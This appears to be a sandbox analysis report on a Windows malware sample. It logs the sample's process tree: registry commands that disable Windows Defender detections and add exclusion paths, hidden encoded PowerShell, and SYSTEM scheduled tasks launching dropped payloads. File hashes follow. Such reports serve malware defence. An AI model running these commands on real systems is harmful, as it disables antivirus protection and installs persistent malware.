C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3500 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4464 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3976
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:5048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4988
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1868
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1196
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:3700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:3200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3912
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3676
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DTVeiSnVEyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DTVeiSnVEyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XSxxgBHfieTOC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XSxxgBHfieTOC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fpJTwAuoAMgU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fpJTwAuoAMgU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fwdFzFoCzBKlRQNBqUR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fwdFzFoCzBKlRQNBqUR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qwQKalOeU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qwQKalOeU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qKCUkteWWCrbVFVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\qKCUkteWWCrbVFVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\vhTqjLQymokpPpPb\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\vhTqjLQymokpPpPb\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4860 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DTVeiSnVEyUn" /t REG_DWORD /d 0 /reg:323⤵PID:1140
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DTVeiSnVEyUn" /t REG_DWORD /d 0 /reg:324⤵PID:4224
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DTVeiSnVEyUn" /t REG_DWORD /d 0 /reg:643⤵PID:2400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XSxxgBHfieTOC" /t REG_DWORD /d 0 /reg:323⤵PID:3232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XSxxgBHfieTOC" /t REG_DWORD /d 0 /reg:643⤵PID:1160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fpJTwAuoAMgU2" /t REG_DWORD /d 0 /reg:323⤵PID:1308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fpJTwAuoAMgU2" /t REG_DWORD /d 0 /reg:643⤵PID:796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fwdFzFoCzBKlRQNBqUR" /t REG_DWORD /d 0 /reg:323⤵PID:3460
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fwdFzFoCzBKlRQNBqUR" /t REG_DWORD /d 0 /reg:643⤵PID:1120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qwQKalOeU" /t REG_DWORD /d 0 /reg:323⤵PID:4768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qwQKalOeU" /t REG_DWORD /d 0 /reg:643⤵PID:4176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qKCUkteWWCrbVFVB /t REG_DWORD /d 0 /reg:323⤵PID:2036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\qKCUkteWWCrbVFVB /t REG_DWORD /d 0 /reg:643⤵PID:3328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj /t REG_DWORD /d 0 /reg:323⤵PID:4888
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\WGlEvBqMGupapHPaj /t REG_DWORD /d 0 /reg:643⤵PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\vhTqjLQymokpPpPb /t REG_DWORD /d 0 /reg:323⤵PID:732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\vhTqjLQymokpPpPb /t REG_DWORD /d 0 /reg:643⤵PID:1040
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gElsJESGL" /SC once /ST 02:21:35 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4516
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gElsJESGL"2⤵PID:2108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gElsJESGL"2⤵PID:3512
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PuhPMVgEjGGxLrdgk" /SC once /ST 04:31:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\vhTqjLQymokpPpPb\VmTAEUFbJqLkgnw\aWlYVTM.exe\" B1 /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4076
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "PuhPMVgEjGGxLrdgk"2⤵PID:4092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3564 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4180
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2012
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:224
-
C:\Windows\Temp\vhTqjLQymokpPpPb\VmTAEUFbJqLkgnw\aWlYVTM.exeC:\Windows\Temp\vhTqjLQymokpPpPb\VmTAEUFbJqLkgnw\aWlYVTM.exe B1 /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3084 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bVdqBxoxNAgpdKrXAY"2⤵PID:2424
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4956
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:952
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1816
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\qwQKalOeU\GsHGXx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "vzgcUMxkKavOBeV" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vzgcUMxkKavOBeV2" /F /xml "C:\Program Files (x86)\qwQKalOeU\OjrPxrK.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3028
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "vzgcUMxkKavOBeV"2⤵PID:4824
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vzgcUMxkKavOBeV"2⤵PID:5060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xOirWQfTevWIgd" /F /xml "C:\Program Files (x86)\fpJTwAuoAMgU2\lPVgfKz.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OCcekUtaGNwbg2" /F /xml "C:\ProgramData\qKCUkteWWCrbVFVB\boMnQBa.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4868
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GiAIJIYNtiaYwwLEy2" /F /xml "C:\Program Files (x86)\fwdFzFoCzBKlRQNBqUR\EdvjbaO.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "mFntJTWMWhghcjgpEZI2" /F /xml "C:\Program Files (x86)\XSxxgBHfieTOC\UFUTvPX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4636
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KhizVdtuvcIJGwZop" /SC once /ST 00:27:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\vhTqjLQymokpPpPb\CdSxXoZe\lxpqZLA.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "KhizVdtuvcIJGwZop"2⤵PID:3476
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:4888
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:2752
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:4516
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PuhPMVgEjGGxLrdgk"2⤵PID:1856
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\vhTqjLQymokpPpPb\CdSxXoZe\lxpqZLA.dll",#1 /site_id 5254031⤵PID:4176
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\vhTqjLQymokpPpPb\CdSxXoZe\lxpqZLA.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1504 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "KhizVdtuvcIJGwZop"3⤵PID:4484
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD51c951c01f80b2a0af6ef26ac30b90a7a
SHA19dbcac6af5535e6ae60f33499d340146029e5811
SHA2566090d95282e409b493227dd40247fee8d790fd119483b08c3ea66ef6c932ac16
SHA512801cb06ab67759b1222a42905c28633b739c6258568fb814cd503e68e5204148d6c4b86a56573334e25ee6c646c29d8e52f2c66180fd96d60adf3e236693a993
-
Filesize
2KB
MD598a1f73b3d80dc8b2d64f3bee1e55804
SHA17197bbfa3605d79506cc39bea22729b0b547b038
SHA25604b02343fa68b51a684a250de7279feeb131ec0edbe1ae60316aeb1604655322
SHA5128523a73b0e0db6d26861c4515099f70d641bb11537324cde21b4a082599469d02a9371769a8f2a0e55bc1adf055489899278101f84ee767281fe0a043ea8b89e
-
Filesize
2KB
MD51e91f2b104517c1acbb980a7c95a3a27
SHA147a4e9e0a2d6d989cc4fe2ec59329dff6ab46ff2
SHA256076b2bb068b6607146fad1566ab2f820f41f32162c4f611d0aecc666eac83984
SHA51280cbfce46c70fc4700168c52eff883bb4e3f9e4cd6db46b593cf151f8691a8d84eb3b08349b9ac3c927c02555397c0ca725db67c5b244558aaec2ab95ee73dae
-
Filesize
2KB
MD5899032e60216c557d179d0b3cef3bf34
SHA1f8d0a99a523eec72c2823f9a4763cab200753e7c
SHA256e7d4653023072713948e6af7eca2b8670d26a6c7b7456727fb60b0d7df0530a5
SHA5124fb7d9b00534ee46bf9eb6746c5a27ca096983c354e7cd506f2f5b45c3366f29a2fc2e7d1ef2fedc39db7591e58d483a27adca753c02d25bc0290dec28d482c6
-
Filesize
2KB
MD5f39f3b59727e0654011ed3a95a9f01d3
SHA1761d9bcff3b612962505ca956471853920fa9290
SHA256f362964741d3b766cdcb3a2164a1244147e05d843adfa655083658a00cd3cbfe
SHA512f8d88f945667ff0f10c613d27c7a62b6ec374133de510d6bdc748b2f9991bcf237d585919fcb2578bea6b0a61a51b7f16c90feb51a951d8c358fcafa032f3fd0
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
6.4MB
MD5f75d376913297c5329c6d49b1c68cee6
SHA1b6fa66f27c416ddde27dad54e4dc6944ab21c33c
SHA256f2a8e8731c5d004121e93d17b2b833afd842f184a55e3f41aa88ec46aebdaad6
SHA5121e714de2eb278d7be77d3d59c3e9cc38015311f4e4bde00abc4342d0c7c403f4798c3bd91919c6f399c904709108743db106b9650491e0cd1dacbfd6795371fb
-
Filesize
6.4MB
